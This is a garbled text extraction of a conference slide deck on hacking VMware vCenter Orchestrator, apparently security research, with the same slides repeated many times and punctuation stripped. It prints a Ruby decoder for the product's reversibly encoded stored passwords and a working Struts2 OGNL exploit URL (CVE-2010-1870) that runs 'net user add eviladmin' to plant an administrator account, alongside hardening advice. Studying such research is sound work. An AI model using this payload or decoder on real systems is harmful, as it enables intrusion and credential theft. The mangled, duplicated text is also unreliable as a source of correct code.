bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 17: Invest in security

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 18: Invest in security

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 19: Invest in security

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 20: Invest in security

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 21: Invest in security

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 22: Invest in security

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

